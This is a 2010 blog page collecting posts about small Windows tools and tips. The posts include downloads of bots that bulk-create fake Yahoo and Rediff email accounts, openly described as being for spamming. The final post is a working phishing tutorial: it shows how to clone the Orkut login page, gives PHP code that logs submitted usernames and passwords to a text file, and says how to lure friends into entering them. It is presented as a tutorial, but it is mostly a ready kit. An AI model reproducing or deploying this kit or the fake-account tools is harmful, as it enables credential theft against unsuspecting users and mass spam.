Search This Blog

Saturday, March 6, 2010

Picasa Mini












Enlarge Screenshot

How To Use:
If any problem comes while using the application, please comment here, I'll definitely rectify it as soon as possible.

Use of Application:
Using Picasa in a simlple windows application.
You can upload and download images from your Picasa account by this application
You can also search for public albums by giving random e-mail ids.


Prerequisites:

  • needs .NET Framework 2.0 or higher
If you don't have .NET Framework on your system. Visit here to download:

http://msdn.microsoft.com/en-us/netframework/default.aspx


Bugs:
Report bugs here in comments.

Application Download:

Thursday, February 25, 2010

File Encryptor Decryptor

 

How To Use:
Encrypt tab for encrypting files.
Decrypt tab for decrypting files.

Use:
Protects your file from being used by unauthorized access. Encrypts files using Symmetric key encryption.

Extensions:
Encryptor Extension

Decryptor Extension

Prerequisites:

  • needs .NET Framework 2.0 or higher
If you don't have .NET Framework on your system. Visit here to download:

http://msdn.microsoft.com/en-us/netframework/default.aspx


Bugs:
Report bugs here in comments.

Application Download:

Saturday, February 20, 2010

Multiple Rediff’s Inbox Opener

 

How To Use:
Click Here to know how to use this application.


Password:
In this application the default password is "a-password". You can change password according to your requirement.

Use of Application:
To make Lockerz account without inserting the details manually.


Prerequisites:

  • needs .NET Framework 2.0 or higher
If you don't have .NET Framework on your system. Visit here to download:

http://msdn.microsoft.com/en-us/netframework/default.aspx


Bugs:
Report bugs here in comments.

Application Download:

Friday, February 19, 2010

Lockerz Friends Adder















Enlarge Screen Shot

How To Use:
Click Here to know how to use this application.

Use of Application:
To open inbox of multiple Rediffmail account's inbox one by one in a single window.


How to implement with Lockerz:
  • Open mail sent by lockerz and copy confirmation link's location.
 































  • Now, paste that link in the textbox given for pasting confirmation links.
  • At last, save data in log file.
Prerequisites:

  • needs .NET Framework 2.0 or higher
If you don't have .NET Framework on your system. Visit here to download:

http://msdn.microsoft.com/en-us/netframework/default.aspx


Bugs:
Report bugs here in comments.

Application Download:
  • Download from Rapidshare
  • Download from another location

Thursday, February 18, 2010

Rediff Fake Profile Maker















How to use:

Step 1: Do this step for generating random user information anr for filling up the values to the form.

Step 2: Insert captcha.
Step 3: Do this step for validating captcha and creating a new account.
Step 4: This button saves the fake e-mail id with password in a text file names as log.txt at c:\ of ur local computer. Please save the user details to log file before creating the new ID.

Password:

In this application the default password is "ilovespamming". You can change password according to your requirement.

Usage:

  • for creating bulk fake mails.
Prerequisites:

  • needs .NET Framework 2.0 or higher
If you don't have .NET Framework on your system. Visit here to download:

http://msdn.microsoft.com/en-us/netframework/default.aspx

Bugs:
Report bugs here in comments.

Application Download:

Wednesday, February 17, 2010

Yahoo Fake Mail Creator

















How to use:

Shuffle Details: This button is for generating random user information.

Fill Details: This button is for filling up the values to the form.

Create Account: This button is for creating account with the given details.

Save to log file: This button saves the fake e-mail id with password in a text file names as log.txt at c:\ of ur local computer. Please save the user details to log file before creating the new ID.

Create New ID: This button is for creating a new account.

Password:

In this application the default password is "abcd1234". You can change password according to your requirement.

Usage:

  • for creating bulk fake mails.
Prerequisites:

  • needs .NET Framework 2.0 or higher
If you don't have .NET Framework on your system. Visit here to download:

http://msdn.microsoft.com/en-us/netframework/default.aspx

Bugs:
Report bugs here in comments.

Application Download:

Sunday, February 14, 2010

Remove Recycle Bin From Desktop


Remove the Recycle Bin from the Desktop

If you don't use the Recycle Bin to store deleted files , you can get rid of its desktop icon all together.

Run Regedit and go to:

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/explorer/Desktop/NameSpace


Click on the "Recycle Bin" string in the right hand pane. Hit Del, click OK.

Or

Step 1:


 









Step 2:


 












Enlarge Screenshot 

Step 3:



Friday, February 12, 2010

Data recovery after format

What is format?
Prepare a storage medium, usually a disk, for reading and writing. When you format a disk, the operating system erases all bookkeeping information on the disk, tests the disk to make sure all sectors are reliable, marks bad sectors (that is, those that are scratched), and creates internal address tables that it later uses to locate information. You must format a disk before you can use it.
Note that reformatting a disk does not erase the data on the disk, only the data on the address tables. Do not be panic, however, if you accidentally reformat a disk that has useful data. A computer specialist should be able to recover most, if not all, of the information on the disk. You can also buy programs that enable you to recover a disk yourself.
The previous discussion, however, applies only to high-level formats, the type of formats that most users execute. In addition, hard disks have a low-level format, which sets certain properties of the disk such as the interleave factor. The low-level format also determines what type of disk controller can access the disk (e.g., RLL or MFM).
Almost all hard disks that you purchase have already had a low-level format. It is not necessary, therefore, to perform a low-level format yourself unless you want to change the interleave factor or make the disk accessible by a different type of disk controller. Performing a low-level format erases all data on the disk.

Symptoms:
Where previously the computer would boot and be usable, systems that have been Formatted often report the following errors: (these errors are frequently displayed on a black screen with white text.)
  • Operating System not found
  • Invalid or corrupt FAT
  • Cannot find file or program
  • Invalid command.com
  • Primary/Secondary Hard disk failure
  • Non system disk
  • Disk error
Or when a partition has been formatted, the all data would disappear.

Download Here Free Data Recovery Tool

Google Buzz

Google Buzz 

Go beyond status messages

Share updates, photos, videos, and more.
Start conversations about the things you find interesting.



Profile pictures of friends

No setup needed

Automatically follow the people you email and chat with the most in Gmail.
Public and private settings

Share publicly or privately

Publish your ideas to the world or just to your closest friends.
Gmail icon

Inbox integration

Comments get sent right to your inbox so it's easy to keep the conversation going.
Photos of friends

Photo friendly

See thumbnails with each post, and browse full-screen photos from popular sites.
Popular social websites

Connect sites you already use

Import your stuff from Twitter, Picasa, Flickr, and Google Reader.
Alarm clock

See updates in real time

New posts and comments pop in as they happen. No refresh required.
Delicious taco

Just the good stuff

Buzz recommends interesting posts and weeds out ones you're likely to skip.

  Watch a video

Thursday, February 4, 2010

Phishing

Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies.

Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

This post only meant for tutorial purpose. It is 100% working please don't misuse. Here we take an example of getting login details of Orkut.

USE IT AT YOUR OWN RISK

First of all you need to find a webhost that supports PHP. I suggest Ripway to upload the required files.

Now, you need create three files:

  1. Fake Orkut Page.

  2. A PHP file that steals the user details.

  3. A Text file to store user details.

Making fake page:

  1. Go to http://www.orkut.com/. A login page will appear.

  2. Press Ctrl+S to save the page. Save page as Login.html.

  3. Now open the saved page using a text editor to edit its source.

  4. Search for action= there. You will find action=https://www.google.com/accounts/ServiceLoginAuth?service=orkut

  5. Replace above line as action=details.php

  6. Save the page by pressing Ctrl+S. Your Fake page is created.

Creating PHP Details Stealer File:

  1. Open notepad and type the following code

<?php

header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=orkut ');

$handle = fopen("logindata.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

  1. Now save the code as details.php

Details Storing Text File:

  1. Make a blank logindata.txt file.

Now, you are almost done. Now you have to upload these three file onto a free hosting site like Ripway.

When you upload these files on ripway your fake page link looks like http://h1.ripway.com/ripwayaccount/Login.html , post this link to your friends like Click Here to get Orkut Plus version, Orkut 2010 version etc. When victim will try to login to the account using your link and presses the Sign In button, his login details will store in logindata.txt and you can see on your webhost.

Warning:

Phising is an illegal activity. Please don't misuse or distribute your phisher page's link. Also delete those files from webhost.